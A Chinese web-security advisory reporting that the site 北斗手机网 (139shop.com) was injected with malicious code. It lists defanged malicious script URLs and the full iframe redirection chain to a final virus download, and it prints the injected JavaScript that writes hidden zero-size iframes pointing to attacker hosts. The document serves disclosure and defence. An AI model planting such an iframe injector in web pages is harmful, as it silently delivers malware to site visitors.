注册
登录
| 关键词: hxxp iframe shop com document 139 adv file eva htm |
知道安全9月27日捕获 北斗手机网(hxxp://www.139shop.com/)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl: hxxp://eva.139shop.com/adv/file/6.js hxxp://eva.139shop.com/adv/file/161.js hxxp://eva.139shop.com/adv/file/296.js hxxp://eva.139shop.com/adv/file/376.js hxxp://eva.139shop.com/adv/file/495.js hxxp://eva.139shop.com/adv/file/497.js 网页被嵌入恶意链接代码: function Get(){ var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = “Cookie1=” var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else { document.cookie = “Cookie1=risb;expires=”+ Then.toGMTString() document.write(”<div style=\”display:none\”>”); document.write(”<iframe width=’0′ height=’0′ src=’hxxp://888999555.9966.org/kuaile789/8.htm’></iframe>”); document.writeln(”<iframe width=’0′ height=’0′ src=’hxxp://www.mszqw.com/1.html’></iframe>”); } }Get(); 挂马分析: [root]hxxp://eva.139shop.com/adv/adv.asp?id=495 [script]hxxp://eva.139shop.com/adv/file/495.js [iframe]hxxp://888999555.9966.org/kuaile789/8.htm [iframe]hxxp://nm11df.cn/x50/xx.html [iframe]hxxp://nm11df.cn/x50/td14.htm [iframe]hxxp://nm11df.cn/x50/yt.htm [iframe]hxxp://nm11df.cn/x50/td09.htm [iframe]hxxp://nm11df.cn/x50/yut.htm [iframe]hxxp://nm11df.cn/x50/ytfl.htm [iframe]hxxp://nm11df.cn/x50/ytfl1.htm [iframe]hxxp://nm11df.cn/x50/of.htm [iframe]hxxp://www.mszqw.com/1.html 最终下载病毒文件: hxxp://d.fgddx.com/xx/x50.css 通过执行以上病毒文件,来达到完全控制访问者的系统。 该网站历史挂马次数:3 Google对该网站的判定:安全 知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:hxxp://www.cert.org.cn/ 推荐的应对方法: 1.安装客户端保护软件。 2.检查更新windows及第三方软件补丁程序。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
